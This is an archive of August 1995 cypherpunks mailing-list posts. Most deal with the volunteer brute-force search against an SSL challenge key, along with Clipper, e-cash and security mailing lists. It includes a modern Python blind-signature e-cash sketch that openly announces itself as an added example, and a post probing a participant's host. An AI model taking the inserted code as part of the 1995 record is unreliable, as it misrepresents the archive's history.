Message-ID: <Pine.SUN.3.91.950824122951.12822D-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995 aba@atlas.ex.ac.uk wrote:

> You wouldn't happen to have gcc under DOS would you?
> 
> Or anyone else with djgcc for DOS?
> 
> What would be really nice would be a 32 bit DOS executable, which is
> very hard to obtain with any PC software, and compiling it 16 bit
> suffers a huge performance hit.
> 
> In search of a 32 bit DOS binary,

  In the same vein, a 32 bit OS2 version would be nice.

  I'm not sure how brutessl works exactly, but if it could connect to the 
server, get its key assignments, and then chug away while disconnected 
from the net I could see what kind of speed I get out of my 40MHz 486.

   Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 12:33:51 PDT
To: cypherpunks@toad.com
Subject: Matt Blaze's paper on Clipper...
Message-ID: <199508241933.MAA21565@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

I don't seem to be able to locate it, but I had it earlier on.
Does anyone know where it is?

I'm talking to a reporter about the EPIC alert, and want to show
him Matt's attack.

/Christian W




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <sean@escape.ca>
Date: Thu, 24 Aug 95 10:40:33 PDT
To: Patrick Horgan <patrick@Verity.COM>
Subject: Re: Linux brutessl client
In-Reply-To: <9508241712.AA15565@cantina.verity.com>
Message-ID: <Pine.SOL.3.91.950824123643.26720F-100000@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Patrick Horgan wrote:

> <snicker> I only get 5900 keys/second on a SPARCstation 5:)

My SPARC 5 does 9600 :(  However, I have to run it on a 386DX 33 that 
only gets 1400 :{

Sean

o-------------------o----------------------o-----------------------o
|   Sean Walberg,   |    Tech Support      | Pas_al, _obol, BASI_, |
|  sean@escape.ca   | escape communication |   PostS_ript, T_L...  |
| Mail for PGP key  |      925-4290        | C fills all the holes |
o----------------] http://www.escape.ca/~sean [--------------------o





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 23 Aug 95 19:43:22 PDT
To: stevenw@iglou.com (Steven Weller)
Subject: Re: e$: The Book-Entry/Certificate Distinction
In-Reply-To: <v01520d06ac6060379f25@[199.171.88.71]>
Message-ID: <199508240241.MAA07578@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello rah@shipwright.com (Robert Hettinga)
  and stevenw@iglou.com (Steven Weller)
  and cypherpunks@toad.com

[certificates have their own inherent worth etc]

> In such a system, where does credit come in? If I have a certificate that
> is worth X, then does the recipient know that it's from my "credit card"?
> How do I obtain credit, and in what form does it exist?

There's no reason for the recipient to know it's from your credit card.
You simply obtain cash from your bank as a loan and then give it to
the recipient.

If you want to provide the convenience of CC (ie avoid having to go to
the ATM first), you could allow wallets to communicate with the bank
via the merchant's equipment, in effect building an ATM into every 
point-of-sale terminal.

wallet via merchant to bank: withdraw X from account Y
bank via merchant to wallet: here is X in e-cash
wallet to merchant: here is X in e-cash

If you do not wish the bank to know which merchant it was, you could send
it via an anonymizing service or two.

> Furthermore, how do we assess the value of real physical things in a system
> like this?

Well, same as in any other system: "how much are you willing to give me
for this?"

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 24 Aug 95 10:58:45 PDT
To: cypherpunks@toad.com
Subject: brutessl client
Message-ID: <199508241809.NAA06774@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, my 386SX-33 (w/FPU) is doing about 1000/sec, my Compaq Deskpro386/20e
(w/fpu) is doing 1000/s, and my 486DX2-80 is doing 8100/s.

The two 386 machines will be working on it full time, the 486 will be
time-slicing with 'real work'.

Now all I need is some keyspace :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 24 Aug 95 10:20:17 PDT
To: Scott Brickner <cypherpunks@toad.com
Subject: Re: Spooks and Hackers, etc.
In-Reply-To: <9508241620.AA13830@ozymandias.austin.ibm.com>
Message-ID: <9508241718.AA23321@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Brad Dolan writes
>>"We need to see that police are surfing the Internet just as other people
>>are," Doyle said. "This is a good example of where the law is slower than
>>technology."

>Duh!  Isn't the law *supposed* to be slower than technology?  It would
>take a *complete* idiot to try to make a law about, say, intelligent
>programs or uploads or whatever.  It's when law wants to be *faster*
>than technology that we get stupidity like the CDA.

I'm somewhat surprised that a police force would be talking in these terms, in 
the UK the police have been looking at USEnet et al for over a decade.


I don't think the CDA has anything to do with the law keeping up, it's the 
opposite. It's about cynical and unscrupulous politicians using public ignorance 
to portray themselves as the saviours of society. First create a straw man then 
fight it.


All the net is doing is exposing the weakness of the press. Events like the 
cyberporn scandal simply illustrate the normal modus-operandi, they are not 
aberrations caused by `poor journalism'. It is worth reading Chomsky's analysis 
of the press. If one excludes the anti-establishment attacks the underlying 
thesis is consistent with observation. The established press is not pro-active 
but reactive, it does not seek to inform but to entertain. Facts are checked for 
acceptability and plausibility rather than for accuracy.

It is here that the most potent effects of the Web will be found. There is now 
an international normative infrastructure. It is much harder for a political 
system to sustain a scotoma. Consider, Libya is accused of involvement in the 
Pan Am/Lockerbie bombing, despite the fact that the evidence is tenuous and that 
the US was until recently accusing Syria of having authored the crime there is a 
call for international sanctions. On the other hand it is the tenth anniversary of 
the sinking of the Rainbow Warrior and the murder of one of its crew by the 
French Secret service. Far from apologising for this crime and imprisoning 
those responsible France has even decorated one of the murderers.

Consider also the insistence on the Japanese apologising for World War II 
despite the lack of an equivalent apology by the British for their imperial 
conquests or the US for their attack on Vietnam.

Exposing the international nature of atrocity weakens its power to coerce a 
population into externalising conflict. It is scarcely controversial that were 
the true facts of the Iraqi invasion of Kuwait to be generally known the Iraqi 
population would have considerably less support for Saddam. 

International communication will weaken nationalist ties and isolationism. It 
will no longer be possible to present issues in the same moral framework, ie a 
framework in which "right" is automatically equated with self-interest.


		Phill H-B








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cg@bofh.lake.de (Cees de Groot)
Date: Thu, 24 Aug 95 04:54:28 PDT
To: poodge@econ.Berkeley.EDU (Sam Quigley)
Subject: Re: Linux brutessl client
In-Reply-To: <199508240448.VAA12304@quesnay.Berkeley.EDU>
Message-ID: <m0slaeI-000PZbC@bofh.lake.de>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Thu, 24 Aug 95 11:04:39 PDT
To: David Taffs <dat@ebt.com>
Subject: Re: The End of the Ecash Trial?
In-Reply-To: <199508231635.MAA07961@mummy.cis.ohio-state.edu>
Message-ID: <199508241803.OAA25715@brain.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Taffs writes:
 > Will there be a collectors market for c$? Does Chaumian cash work
 > as collectable antiques?

Not if no authority exists to certify that your coins are
unspent. Otherwise, I can just keep trading my coins back and forth to
Digicash and saving copies of the used ones.

nathan
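
The two e-cash points made in the messages above (Jiri Baum's withdrawal relayed through the merchant's equipment, and Nathan Loofbourrow's remark that a coin is only worth something while an authority can certify it unspent) can be seen together in a short sketch. This is an added example, not code from any poster or from Digicash: it uses a textbook RSA blind signature with a toy key, one fixed denomination, and hypothetical class names, and it omits how the wallet authenticates to the bank.

```python
import hashlib
import math
import secrets

# Toy RSA key for the bank: constructed for this example, far too small for real use.
P = 2**127 - 1            # Mersenne prime
Q = 2**89 - 1             # Mersenne prime
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # bank's private exponent


def coin_digest(serial: bytes) -> int:
    """Map a coin serial number to the integer the bank signs."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Bank:
    def __init__(self, balances):
        self.balances = dict(balances)
        self.spent = set()              # serials of coins already deposited
        self.seen_at_withdrawal = []    # everything the bank saw when signing

    def withdraw(self, account, blinded):
        # Assumption: the wallet has already proven it controls `account`.
        if self.balances.get(account, 0) < 1:
            raise ValueError("insufficient funds")
        self.balances[account] -= 1
        self.seen_at_withdrawal.append(blinded)
        return pow(blinded, D, N)       # signature on the blinded value only

    def deposit(self, payee, serial, sig):
        if pow(sig, E, N) != coin_digest(serial):
            return "bad signature"
        if serial in self.spent:        # the "certify unspent" step
            return "already spent"
        self.spent.add(serial)
        self.balances[payee] = self.balances.get(payee, 0) + 1
        return "ok"


class Merchant:
    """Point-of-sale terminal that relays withdrawals and deposits coins online."""

    def __init__(self, bank, account):
        self.bank, self.account = bank, account

    def relay_withdrawal(self, account, blinded):
        # wallet via merchant to bank / bank via merchant to wallet
        return self.bank.withdraw(account, blinded)

    def accept(self, serial, sig):
        # wallet to merchant: here is X in e-cash
        return self.bank.deposit(self.account, serial, sig)


class Wallet:
    def __init__(self, account):
        self.account = account

    def withdraw_via(self, merchant):
        serial = secrets.token_bytes(16)
        while True:                     # blinding factor must be invertible mod N
            r = secrets.randbelow(N - 2) + 2
            if math.gcd(r, N) == 1:
                break
        blinded = coin_digest(serial) * pow(r, E, N) % N
        signed_blinded = merchant.relay_withdrawal(self.account, blinded)
        sig = signed_blinded * pow(r, -1, N) % N   # unblind: sig = digest^D mod N
        return serial, sig


def demo():
    bank = Bank({"alice": 1, "shop": 0})
    shop = Merchant(bank, "shop")
    serial, sig = Wallet("alice").withdraw_via(shop)
    first = shop.accept(serial, sig)
    replay = shop.accept(serial, sig)   # a saved copy of the used coin
    return {
        "first_deposit": first,
        "replayed_copy": replay,
        "copy_still_verifies": pow(sig, E, N) == coin_digest(serial),
        "bank_saw_coin_at_withdrawal": coin_digest(serial) in bank.seen_at_withdrawal,
        "balances": bank.balances,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The copy of the spent coin still carries a valid bank signature; only the bank's spent list tells it apart from a fresh one, which is why a saved coin has no value once that authority is gone.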




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel C. Cotey" <dccotey@zonev.uccs.edu>
Date: Thu, 24 Aug 95 13:04:38 PDT
To: cypherpunks@toad.com
Subject: WinNT or Linux for SSL challenge ?
Message-ID: <Pine.ULT.3.90.950824140055.21474A-100000@zonev>
MIME-Version: 1.0
Content-Type: text/plain



	I have a pentium 90 that will be set up to dual boot WinNT 3.5 server
and linux 1.2.8, is one of them significantly faster ?

---                                                                         ---
 Daniel Cotey	   					 dccotey@serf.uccs.edu
				                      dccotey@ecepc44.uccs.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harry@starbase.sj.unisys.com
Date: Thu, 24 Aug 1995 14:13:59 -0700 (PDT)
To: lile@art.net (Lile Elam)
Subject: EPIC states FBI files concluded that Clipper must be mandatory (fwd)
Message-ID: <14a48a4c397df5b0c3596bf2e659c3c3@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded-by: bostic@bsdi.com (Keith Bostic)
Forwarded-by: Wendell Craig Baker <wbaker@splat.baker.com>

FOR RELEASE:  August 16, 1995, 2:00 p.m. EST

CONTACT: David Sobel (202) 544-9240

               FBI FILES: CLIPPER MUST BE MANDATORY


	WASHINGTON, DC - Newly-released government documents show 
that key federal agencies concluded more than two years ago that 
the "Clipper Chip" encryption initiative will only succeed if 
alternative security techniques are outlawed.  The Electronic 
Privacy Information Center (EPIC) obtained the documents from the 
Federal Bureau of Investigation under the Freedom of Information 
Act.  EPIC, a non-profit research group, received hundreds of 
pages of material from FBI files concerning Clipper and 
cryptography.

	The conclusions contained in the documents appear to conflict 
with frequent Administration claims that use of Clipper technology 
will remain "voluntary."  Critics of the government's initiative, 
including EPIC, have long maintained that the Clipper "key-escrow 
encryption" technique would only serve its stated purpose if made 
mandatory.  According to the FBI documents, that view is shared by 
the Bureau, the National Security Agency (NSA) and the Department 
of Justice (DOJ).

	In a "briefing document" titled "Encryption: The Threat, 
Applications and Potential Solutions," and sent to the National 
Security Council in February 1993, the FBI, NSA and DOJ concluded 
that:

     Technical solutions, such as they are, will only work if 
     they are incorporated into *all* encryption products.  
     To ensure that this occurs, legislation mandating the 
     use of Government-approved encryption products or 
     adherence to Government encryption criteria is required.

	Likewise, an undated FBI report titled "Impact of Emerging 
Telecommunications Technologies on Law Enforcement" observes that 
"[a]lthough the export of encryption products by the United States 
is controlled, domestic use is not regulated."  The report 
concludes that "a national policy embodied in legislation is 
needed."  Such a policy, according to the FBI, must ensure "real-
time decryption by law enforcement" and "prohibit[] cryptography 
that cannot meet the Government standard."

	The FBI conclusions stand in stark contrast to public 
assurances that the government does not intend to prohibit the use 
of non-escrowed encryption.  Testifying before a Senate Judiciary 
Subcommittee on May 3, 1994, Assistant Attorney General Jo Ann 
Harris asserted that:

     As the Administration has made clear on a number of 
     occasions, the key-escrow encryption initiative is a 
     voluntary one; we have absolutely no intention of 
     mandating private use of a particular kind of 
     cryptography, nor of criminalizing the private use of 
     certain kinds of cryptography.

 	According to EPIC Legal Counsel David Sobel, the newly-
disclosed information "demonstrates that the architects of the 
Clipper program -- NSA and the FBI -- have always recognized that 
key-escrow must eventually be mandated.  As privacy advocates and 
industry have always said, Clipper does nothing for law 
enforcement unless the alternatives are outlawed."

	Scanned images of several key documents are available via the 
World Wide Web at the EPIC Home Page:

		http://www.epic.org/crypto/ban/fbi_dox/
                              -30-
_________________________________________________________________________
Subject: FBI Files on Clipper Released
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 14:17:09 PDT
To: trei@process.com
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <9508242051.AA13777@toad.com>
Message-ID: <199508242116.OAA23923@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| I've been looking at the allocated list of keys, and I notice a possible 
| problem:  One user has allocated 50,000 segments:

Where can one observe the progress of the computations? What is 
allocated etc?

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Thu, 24 Aug 95 14:46:48 PDT
To: trei@process.com
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <9508242051.AA13777@toad.com>
Message-ID: <199508242146.OAA13613@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Peter" == Peter Trei <trei@process.com> writes:

    > I've been looking at the allocated list of keys, and I notice a
    > possible problem: One user has allocated 50,000 segments:

    > 0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>

    > Now, it's possible this fellow has some vast farm of high-speed
    > workstations, but I doubt it.  Finger suggests that this is a
    > linux box. [...]

Finger reports that it is indeed a linux (1.2.9) box with a low load
average (0.00, 0.00, 0.00 right now), but that Mr. Thomas is on from
nemesis.ogi.com.

nemesis refuses finger, telnet, and ftp connections, but, on WWW
connect, asks for a userid and password for the "Marcam Development
WWW site at nemesis.ogi.com."

Marcam (http://www.marcam.com) makes something to do with computers,
so Mr. Thomas could well have a bunch of computers at his
disposal... (Even so, 50000 is a big number)

I can't actually figure out what, specifically, Marcam makes.  They
produce applications which reduce costs, increase flexibility, and the
whole shebang... but nowhere does it say what the programs *do*...

Smells like an NSA front.

-sq :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Thu, 24 Aug 95 14:51:20 PDT
To: cwe@Csli.Stanford.EDU
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <199508242116.OAA23923@Csli.Stanford.EDU>
Message-ID: <199508242151.OAA13622@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Christian" == Christian Wettergren <cwe@Csli.Stanford.EDU> writes:

    > Where can one observe the progress of the computations? What is
    > allocated etc?

try http://www.brute.cl.cam.ac.uk/cgi-bin/brute?op=stats

How often is this updated?  I've allocated (and ACKed) more keyspace
than it shows I have, and I wonder if my requests might have gotten
munged.  So far, the only thing it shows I've acked is the keyspace I
manually ACKed over the WWW interface (actually, I ACKed it a bunch of
times -- the forms weren't producing responses, so I resent them a
couple times..)

-sq






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@access.digex.net>
Date: Thu, 24 Aug 95 11:56:46 PDT
To: aba@atlas.ex.ac.uk
Subject: SSL CHALLENGE:  Can't search with Win32 client!
In-Reply-To: <11274.9508241443@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SUN.3.91.950824144329.9284B-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


I've got some keyspace, from various projects and test projects on the 
server, but no matter what key range I select, I can't get the Search 
button to be active (not greyed out).

Anybody else getting this?

Joe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Thu, 24 Aug 95 15:08:01 PDT
To: mkl@nw.com
Subject: EPIC states FBI files concluded that Clipper must be mandatory (fwd)
Message-ID: <199508242205.PAA05087@art.net>
MIME-Version: 1.0
Content-Type: text/plain


This was interesting...

----- Begin Included Message -----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 24 Aug 95 13:08:11 PDT
To: cypherpunks@toad.com
Subject: SSLbrute progress.
Message-ID: <9508242007.AA19900@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Thu Aug 24 20:02:47 GMT 1995

Two hours into it, and the key numbers that brclient is returning
show about 5% allocated already....  That brings this to closure
in around 24 hours - 12hours for 1/2 the space.

Although - I also just checked the status, and it doesn't seem to be up to
date with the keys I am getting, and it doesn't show any that it
does have under my name as being acked.  This could be just a delay
thing I guess, but it could also be that I just updated brloop
and brclient to the latest versions.

Has anyone else thought of putting Damien's slave code that 
checks for idle tty's, etc into brutessl?

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
http://spirit.aud.alcatel.com:8081/~droelke/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Thu, 24 Aug 95 15:13:34 PDT
To: cypherpunks@toad.com
Subject: Brutesslos2.exe won't run
Message-ID: <199508242211.PAA31692@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Trying to run brutesslos2.exe on my OS/2 box, I get:

SYS1804:  The system cannot find the file EMX
-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 15:14:53 PDT
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: server congestion?
Message-ID: <199508242214.PAA25424@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Couldn't one take advantage of the 50.000 mistake, by
setting up a second server for that space. I guess 
things will screw up when the first server reaches 
FFFF, as indicated earlier.

What would be nice is if one could divide up the key
between servers also.

Another thing that might decrease the load on the server
is if we start allocating more blocks at a time, let's
say 2-4 blocks each time. Wouldn't that help?

/Christian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 24 Aug 95 15:16:45 PDT
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <Pine.3.89.9508250018.A1207-0100000@digit.ee>
Message-ID: <199508242215.PAA25512@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| BTW how can I log brloop's output into a file and not to the screen?

#!/bin/sh
brloop > /tmp/worklog.ssl 2>&1 &

is what I did.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt7508b@prism.gatech.edu (PHrEaK!)
Date: Thu, 24 Aug 95 12:22:50 PDT
To: cypherpunks@toad.com
Subject: PGPfone Release is coming soon! (fwd)
Message-ID: <199508241922.PAA20604@acmex.gatech.edu>
MIME-Version: 1.0
Content-Type: text


> As you may have seen, the news media has picked up on the upcoming
> PGPfone release. This note is to let you know that we at MIT are working
> with Phil Zimmermann and the PGPfone team to distribute PGPfone from
> MIT. We expect to have a *BETA* test version (Macintosh Only) of PGPfone
> available shortly.
Is there a unix version planned???

-- 
=-=-=-=-=-=-= Tom Cross AKA The White Ninja / Decius 6i5 */^\* -=-=-=-=-=-=-=-
-=-=-=-=-=- TWN615@mindvox.phantom.com  GT7508B@prism.gatech.edu =-=-=-=-=-=-=
=- "Government is not a reason, not an eloquence; it is a force. Like fire, =-
-=- it is a dangerous servant and a fearful master." -- George Washington -=-=



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 24 Aug 95 12:38:06 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: SSL CHALLENGE:  Can't search with Win32 client!
Message-ID: <9508241937.AA10860@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> I've got some keyspace, from various projects and test projects on the 
> server, but no matter what key range I select, I can't get the Search 
> button to be active (not greyed out).

> Anybody else getting this?

> Joe

I did. If you look at 'properties' you'll probably find the data needs 
updating. click up 'update' to do this. It now seems to be working for 
me.

Now if only I could get the 'search status' window to tell me something...



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 07:44:17 PDT
To: cypherpunks@toad.com
Subject: SSL CHALLENGE: 3 hours to go...
Message-ID: <11274.9508241443@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



The start time for the kick off on the race to crack Hal's 2nd
challenge is fast approaching...

	18:00 GMT

That's only a little over 3 hours away.  Please start your brloop
clients if you have not already.  Chuck in any net connected unix
boxes, never mind how old or slow, they'll still help.  Be ready with
the WWW interface at 18:00 GMT if you don't have direct IP.  The
client runs the brute forcer at nice -20, so it shouldn't interfere
with users.

All code, and step by step instructions for setup on:

	http://www.brute.cl.cam.ac.uk/brute/
or	ftp://ftp.brute.cl.cam.ac.uk/pub/brute/

Binaries available for DOS, Windows 95/NT, generic C code for unix &
others.  Please run the socket code if you can, it'll provide best
utilisation, and least work for you.

May the race begin...

The c$ prize fund has reached c$ 342.30, and the more compute you
personally contribute the greater chance you have of winning it :-)

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Thu, 24 Aug 95 16:01:39 PDT
To: cwe@Csli.Stanford.EDU (Christian Wettergren)
Subject: Re: server congestion?
In-Reply-To: <199508242214.PAA25424@Csli.Stanford.EDU>
Message-ID: <199508242301.QAA29944@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text


> 
> Another thing that might decrease the load on the server
> is if we start allocating more blocks at a time, let's
> say 2-4 blocks each time. Wouldn't that help?
> 

I've been trying to report via WWW for almost 20 minutes...

Yikes!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: duncan@hasp.com (Duncan J Watson)
Date: Thu, 24 Aug 95 13:00:00 PDT
To: cypherpunks@toad.com
Subject: Re: SSL CHALLENGE:  Can't search with Win32 client!
In-Reply-To: <9508241937.AA10860@toad.com>
Message-ID: <9508241604.ZM99@titan.hasp.com>
MIME-Version: 1.0
Content-Type: text/plain


The process seems to be from our admittedly thick-fingered experimentation to 
be as follows:
1) start the client
2) insert the server in the server edit box "sksp.brute.cl.cam.ac.uk"
3) put 19957 in the port edit box
4) push the update button.
5) Select Hal Finney's  SSL 2nd Challenge from the drop box
6) Push the update button again
7) request a small number of key segments (1-10)
8) Select the returned keys and then push the Search button
9) Fill out the dialog box and let the search proceed.

At this point your computer is checking keys.
To view the progress Select options from the menu 
            then select view searches...
You will see the progress in a separate dialog box.
This is my understanding.  
YMMV
djw

On Aug 24,  3:40pm, Peter Trei wrote:
> Subject: Re: SSL CHALLENGE:  Can't search with Win32 client!
>  
> > I've got some keyspace, from various projects and test projects on the 
> > server, but no matter what key range I select, I can't get the Search 
> > button to be active (not greyed out).
> 
> > Anybody else getting this?
> 
> > Joe
> 
> I did. If you look at 'properties' you'll probably find the data needs 
> updating. click up 'update' to do this. It now seems to be working for 
> me.
> 
> Now if only I could get the 'search status' window to tell me something...
> 
> 
> 
> Peter Trei




-- 
Duncan J Watson                            Email:Duncan@hasp.com
Tech Support Manager/Sys Admin             Ph#:  +1 212 564 5678
Aladdin Software Security Inc              Fax#: +1 212 564 3377
:::finger Duncan@hasp.com for PGP key:::   http://www.hasp.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jered@MIT.EDU
Date: Thu, 24 Aug 95 13:05:36 PDT
To: cypherpunks@toad.com
Subject: Re: SSL CHALLENGE: 0.11 borken?
Message-ID: <199508242005.QAA03863@narn.atype.com>
MIME-Version: 1.0
Content-Type: text/plain



   I had several machines running brloop 0.03 and brclient 0.11, and
none of them appeared to be sending ACKs back to the server.  Is this
a known problem? It might account for the large number of unACKed
keyspaces.

  brloop 0.04 and brclient 0.12 seem to work well, however.

--Jered
jered@mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Klaus <cklaus@iss.net>
Date: Fri, 25 Aug 95 18:31:24 PDT
To: cypherpunks@toad.com
Subject: Security Mailing Lists
Message-ID: <199508250052.RAA02427@iss.net>
MIME-Version: 1.0
Content-Type: text/plain




This was put together to hopefully promote greater awareness of the security
lists that already exist.  Most security mailing lists have been only
announced once and it was only word of mouth that it would acquire new
members.  This list should hopefully make the membership grow for each
mailing list.

If you know of any mailing lists that have been skipped, please e-mail
cklaus@iss.net with the info. 

The newest updates for this will be on http://iss.net/.  This web site
also contains info for the following security issues:

	Vendor security contacts
	Security Patches
	What to do if you are compromised
	Set up Anon ftp securely
	Sniffers attacks and solutions


	
Security Mailing Lists

The following FAQ is a comprehensive list of security mailing lists. These
security mailing lists are important tools to network administrators, network
security officers, security consultants, and anyone who needs to keep abreast
of the most current security information available.

General Security Lists

   *  8lgm (Eight Little Green Men)
   *  Academic-Firewalls
   *  Best of Security
   *  Bugtraq
   *  Computer Privacy Digest (CPD)
   *  Computer Underground Digest (CuD)
   *  Cypherpunks
   *  Cypherpunks-Announce
   *  Firewalls
   *  Intruder Detection Systems
   *  Phrack
   *  PRIVACY Forum
   *  Risks
   *  Sneakers
   *  Virus
   *  Virus Alert

Security Products

   *  Tiger
   *  TIS Firewall Toolkit

Vendors and Organizations

   *  CERT
   *  CIAC
   *  HP
   *  Sun

-------------------------------------------------------------------------------

8lgm (Eight Little Green Men)

To join, send e-mail to majordomo@8lgm.org and, in the text of your message
(not the subject line), write:

     subscribe 8lgm-list

Group of hackers that periodically post exploit scripts for various Unix bugs.

-------------------------------------------------------------------------------

Academic Firewalls

To join, send e-mail to majordomo@net.tamu.edu and, in the text of your message
(not the subject line), write:

     SUBSCRIBE Academic-Firewalls

This is an unmoderated list maintained by Texas A&M University. Its purpose is
to promote the discussion and use of firewalls and other security tools in an
academic environment. It is complementary to the Firewalls list maintained by
Brent Chapman (send subscription requests to Majordomo@GreatCircle.COM) which
deals primarily with firewall issues in a commercial environment. Academic
environments have different political structures, ethical issues, expectations
of privacy and expectations of access.

Many documented incidents of cracker intrusions have either originated at or
passed through academic institutions. The security at most universities is
notoriously lax or even in some cases completely absent. Most institutions
don't use firewalls because they either don't care about their institution's
security, they feel firewalls are not appropriate or practical, or they don't
know the extent to which they are under attack from the Internet.

At Texas A&M University we have been using a combination of a flexible packet
filter, intrusion detection tools, and Unix security audit utilities for almost
two years. We have found that simple firewalls combined with other tools are
feasible in an academic environment. Hopefully the discussion on this list will
begin to raise the awareness of other institutions also.

-------------------------------------------------------------------------------

Best of Security

To join, send e-mail to best-of-security-request@suburbia.net with the
following in the body of the message:

     subscribe best-of-security

REASONS FOR INCEPTION

In order to compile the average security administrator it was found that the
compiler had to parse a foreboding number of exceptionally noisy and
